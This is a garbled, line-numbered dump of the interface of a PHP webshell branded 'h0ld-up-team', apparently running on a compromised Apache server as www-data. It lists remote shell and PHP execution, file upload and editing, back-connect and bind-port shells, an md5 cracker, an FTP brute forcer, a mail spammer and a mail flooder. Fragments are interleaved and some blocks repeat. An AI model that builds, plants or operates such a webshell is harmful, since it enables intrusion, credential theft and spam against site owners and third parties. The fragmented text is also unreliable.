1203 | hash: 1204 | 1205 |
1208 | log_file: 1209 | 1210 |
1213 | dictionary_file: 1214 | 1215 |
1218 | 1219 | 1220 |
1222 |
1223 |
1224 |
1225 | 1226 | 1227 | 1358 |
1228 | 1229 | 1236 | 1241 | 1242 | 1247 | 1248 | 1253 | 1254 | 1259 | 1260 | 1265 | 1266 | 1271 |
1230 | .::Spammer::. 1231 |
1232 | emails_file: 1233 | 1234 | 1235 |
1237 | log_file: 1238 | 1239 | 1240 |
1243 | From: 1244 | 1245 | 1246 |
1249 | Subject: 1250 | 1251 | 1252 |
1255 | Message: 1256 | 1257 | 1258 |
1261 | Check*: 1262 | 1263 | 1264 |
1267 | 1268 | 1269 | 1270 |
1272 |
1273 |
1274 | 1275 | 1276 | 1281 | 1286 | 1287 | 1292 | 1293 | 1298 | 1299 | 1303 |
.::FTP-Brute::.
1277 | Host: 1278 | 1279 | 1280 |
1282 | ftp_users file: 1283 | 1284 | 1285 |
1288 | ftp_passwd file: 1289 | 1290 | 1291 |
1294 | ftp_log file: 1295 | 1296 | 1297 |
1300 | 1301 | 1302 |
1304 |
1305 |
1306 | 1307 | 1314 | 1315 | 1320 | 1321 | 1326 | 1327 | 1332 | 1333 | 1338 | 1339 | 1344 | 1345 | 1350 | 1351 | 1356 |
1308 | .::Flooder::. 1309 |
1310 | log_file: 1311 | 1312 | 1313 |
1316 | Send to: 1317 | 1318 | 1319 |
1322 | From: 1323 | 1324 | 1325 |
1328 | Subject: 1329 | 1330 | 1331 |
1334 | Message: 1335 | 1336 | 1337 |
1340 | Amount: 1341 | 1342 | 1343 |
1346 | Check*: 1347 | 1348 | 1349 |
1352 | 1353 | 1354 | 1355 |
1357 |
1359 |
1361 |
1363 |
.:[Public v1.0]:.
1364 | 1365 | 1366 | 1367 | 1368 | 1369 | 1370 | 1371 | 1372 | 1373 | 1374 | 1375 | 1376 | 1377 | 1378 | 1379 | 1380 | .::Black Hat | Ethical Hacking | Special Webshell | Educational Purpose Only::. 1381 | 1382 | 1390 | 1401 | 1402 | 1403 |
1404 | 1562 | 2085 |
1405 | 1406 | 1434 | 1450 | 1560 |
1407 | 1408 | 1411 | 1414 | 1417 | 1420 | 1423 | 1426 | 1429 | 1432 |
1409 | System: 1410 | 1412 | Linux 4.9.26v7-aufs #1 SMP Tue May 9 20:14:03 CEST 2017 1413 |
1415 | Server: 1416 | 1418 | Apache/2.4.29 (Debian) 1419 |
1421 | User: 1422 | 1424 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 1425 |
1427 | pwd: 1428 | 1430 | /var/www/html/ 1431 |
1433 |
1435 |
1436 |
1437 | 1438 |
1439 |
.::h0ld-up-team::.
web-shell
1440 |
1441 |
1442 |
1443 | 1444 | 1445 | 1446 |
1447 |
1448 | 1449 |
1451 | 1452 | 1489 | 1506 | 1523 | 1524 | 1541 | 1558 |
1453 | 1454 | 1457 | 1460 | 1463 | 1466 | 1469 |
1455 | PHP-version: 1456 |
1458 | MySQL: 1459 |
1461 | MSSQL: 1462 |
1464 | PostgreSQL: 1465 |
1467 | Oracle: 1468 |
1470 |
1471 | 1472 | 1475 | 1478 | 1481 | 1484 | 1487 |
1473 | 7.2.4-1 1474 |
1476 | OFF 1477 |
1479 | OFF 1480 |
1482 | OFF 1483 |
1485 | OFF 1486 |
1488 |
1490 | 1493 | 1496 | 1499 | 1502 | 1505 |
1491 | Safe_mode: 1492 |
1494 | cURL: 1495 |
1497 | wget: 1498 |
1500 | fetch: 1501 |
1503 | lynx: 1504 |
1507 | 1510 | 1513 | 1516 | 1519 | 1522 |
1508 | OFF 1509 |
1511 | OFF 1512 |
1514 | ON 1515 |
1517 | OFF 1518 |
1520 | OFF 1521 |
1525 | 1528 | 1531 | 1534 | 1537 | 1540 |
1526 | Perl: 1527 |
1529 | Server time: 1530 |
1532 | Server date: 1533 |
1535 | Total space: 1536 |
1538 | Free space: 1539 |
1542 | 1545 | 1548 | 1551 | 1554 | 1557 |
1543 | ON 1544 |
1546 | 02:09 1547 |
1549 | 20-05-2018 1550 |
1552 | 28.27 GB 1553 |
1555 | 10.51 GB 1556 |
1559 |
1561 |
1563 | 1564 | 2083 |
1565 | 1566 | 1586 | 1587 | 1588 | 1589 | 1613 |
1567 |
1568 | 1569 |
1585 |
1590 | 1591 | 1597 | 1611 |
1592 | .::System shell::.
1593 | 1594 |
1595 |
1596 |
1598 |
1599 | 1600 | 1606 | 1609 |
1601 | .::PHP-code::. 1602 | 1603 | 1604 | 1605 |
1607 | 1608 |
1610 |
1612 |
1614 | 1615 | 1616 |
1617 | 1618 | 1644 | 1716 | 1831 | 1851 | 1852 |
1619 |
1620 | 1621 | 1627 | 1630 |
1622 | .::PWD::. 1623 | 1624 | 1625 | 1626 |
1628 | 1629 |
1631 |
1632 | 1633 | 1639 | 1642 |
1634 | .::File Edit::. 1635 | 1636 | 1637 | 1638 |
1640 | 1641 |
1643 |
1645 |
1646 | 1647 | 1653 | 1656 |
1648 | .::Download::. 1649 | 1650 | 1651 | 1652 |
1654 | 1655 |
1657 |
1658 | 1659 | 1665 | 1671 |
1660 | .::Upload::. 1661 | 1662 | 1663 | 1664 |
1666 | New name: 1667 | 1668 | 1669 | 1670 |
1672 |
1673 |
1674 | 1675 | 1681 | 1715 |
1676 | .::Alias::. 1677 | 1678 | 1679 | 1680 |
1682 | 1714 |
1832 |
1833 | 1834 | 1839 | 1844 | 1849 |
1835 | .::Base64_encode::. 1836 | 1837 | 1838 | 1840 | .::Base64_decode::. 1841 | 1842 | 1843 |
1845 | 1846 | 1847 | 1848 |
1850 |
1853 |
1854 |
1855 | 1856 | 1886 |
1857 |
1858 | 1860 | 1861 | 1862 | 1863 | 1865 | 1866 | 1867 | 1868 | 1870 | 1871 | 1872 | 1873 | 1879 | 1880 | 1884 |
1859 | .::Back Connect::.
IP: 1864 |
port: 1869 |
Method: 1874 |
1881 | 1882 | 1883 |
1885 |
1887 |
1888 | 1889 | 1919 |
1890 |
1891 | 1893 | 1894 | 1895 | 1896 | 1898 | 1899 | 1900 | 1901 | 1903 | 1904 | 1905 | 1906 | 1912 | 1913 | 1917 |
1892 | .::Bind port::.
Port: 1897 |
pass: 1902 |
Method: 1907 |
1914 | 1915 | 1916 |
1918 |
1920 |
1921 |
1922 | 1925 | 1929 | 1930 | 1934 | 1935 | 1939 | 1940 | 1944 |
1923 | .::md5 bruter::. 1924 |
1926 | hash: 1927 | 1928 |
1931 | log_file: 1932 | 1933 |
1936 | dictionary_file: 1937 | 1938 |
1941 | 1942 | 1943 |
1945 |
1946 |
1947 |
1948 | 1949 | 1950 | 2081 |
1951 | 1952 | 1959 | 1964 | 1965 | 1970 | 1971 | 1976 | 1977 | 1982 | 1983 | 1988 | 1989 | 1994 |
1953 | .::Spammer::. 1954 |
1955 | emails_file: 1956 | 1957 | 1958 |
1960 | log_file: 1961 | 1962 | 1963 |
1966 | From: 1967 | 1968 | 1969 |
1972 | Subject: 1973 | 1974 | 1975 |
1978 | Message: 1979 | 1980 | 1981 |
1984 | Check*: 1985 | 1986 | 1987 |
1990 | 1991 | 1992 | 1993 |
1995 |
1996 |
1997 | 1998 | 1999 | 2004 | 2009 | 2010 | 2015 | 2016 | 2021 | 2022 | 2026 |
.::FTP-Brute::.
2000 | Host: 2001 | 2002 | 2003 |
2005 | ftp_users file: 2006 | 2007 | 2008 |
2011 | ftp_passwd file: 2012 | 2013 | 2014 |
2017 | ftp_log file: 2018 | 2019 | 2020 |
2023 | 2024 | 2025 |
2027 |
2028 |
2029 | 2030 | 2037 | 2038 | 2043 | 2044 | 2049 | 2050 | 2055 | 2056 | 2061 | 2062 | 2067 | 2068 | 2073 | 2074 | 2079 |
2031 | .::Flooder::. 2032 |
2033 | log_file: 2034 | 2035 | 2036 |
2039 | Send to: 2040 | 2041 | 2042 |
2045 | From: 2046 | 2047 | 2048 |
2051 | Subject: 2052 | 2053 | 2054 |
2057 | Message: 2058 | 2059 | 2060 |
2063 | Amount: 2064 | 2065 | 2066 |
2069 | Check*: 2070 | 2071 | 2072 |
2075 | 2076 | 2077 | 2078 |
2080 |
2082 |
2084 |
2086 |
.:[Public v1.0]:.
2087 | 2088 | 2089 | --------------------------------------------------------------------------------